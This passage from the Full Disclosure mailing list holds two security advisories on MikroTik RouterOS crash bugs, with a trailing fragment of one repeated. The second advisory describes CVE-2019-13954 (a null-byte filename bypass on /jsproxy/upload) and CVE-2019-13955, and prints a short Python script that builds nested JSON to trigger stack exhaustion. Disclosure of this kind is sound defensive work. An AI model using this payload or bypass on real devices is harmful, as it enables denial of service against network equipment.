> 
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.6 (Long-term release tree)
Fixed Versions: 6.44.6 (Long-term release tree)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
long-term release tree when found. Maybe other release trees also suffer
from these issues.

1. The console process suffers from a memory corruption issue.
An authenticated remote user can crash the console process due to a NULL
pointer reference by sending a crafted packet.

2. The console process suffers from an assertion failure issue. There is a
reachable assertion in the console process. An authenticated remote user
can crash the console process duo to assertion failure by sending a crafted
packet.

Solution


Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.5 (Long-term release tree),
   before 6.45.1 (Stable release tree)
Fixed Versions: 6.44.5 (Long-term release tree),
6.45.1 (Stable release tree)
Vendor URL: https://mikrotik.com/download/changelogs/long-term-release-tree
Vendor Status: fixed version released
CVE: CVE-2019-13954, CVE-2019-13955
Credit: Qian Chen(@cq674350529) of the Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Details of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
6.42.11 and 6.43.16 (Long-term release tree) when found.


1. CVE-2019-13954: memory exhaustion via a crafted POST request
This vulnerability is similiar to the CVE-2018-1157. An authenticated user
can cause the www binary to consume all memory via a crafted POST request
to /jsproxy/upload. It's because of the incomplete fix for the
CVE-2018-1157.

Based on the poc for cve_2018_1157 provided by the @Jacob Baines (really
appreciate!), crafting a filename ending with many '\x00' can bypass the
original fix to trigger the vulnerability.


2. CVE-2019-13955: stack exhaustion via recuring parsing of JSON
This vulnerability is similar to the CVE-2018-1158. An authenticated user
communicating with the www binary can trigger a stack exhaustion
vulnerability via recursive parsing of JSON containing message type M.

Based on the poc for cve_2018_1158 provided by the @Jacob Baines (really
appreciate!), crafting an JSON message with type M can trigger the
vulnerability. A simple python script to generate the crafted message is as
follows.

msg = "{M01:[M01:[]]}"
for _ in xrange(2000):
msg = msg.replace('[]', "[M01:[]]")


Solution


Upgrade to RouterOS versions 6.44.5 (Long-term release tree), 6.45.1
(Stable release tree).


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree
[2] https://github.com/tenable/routeros

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/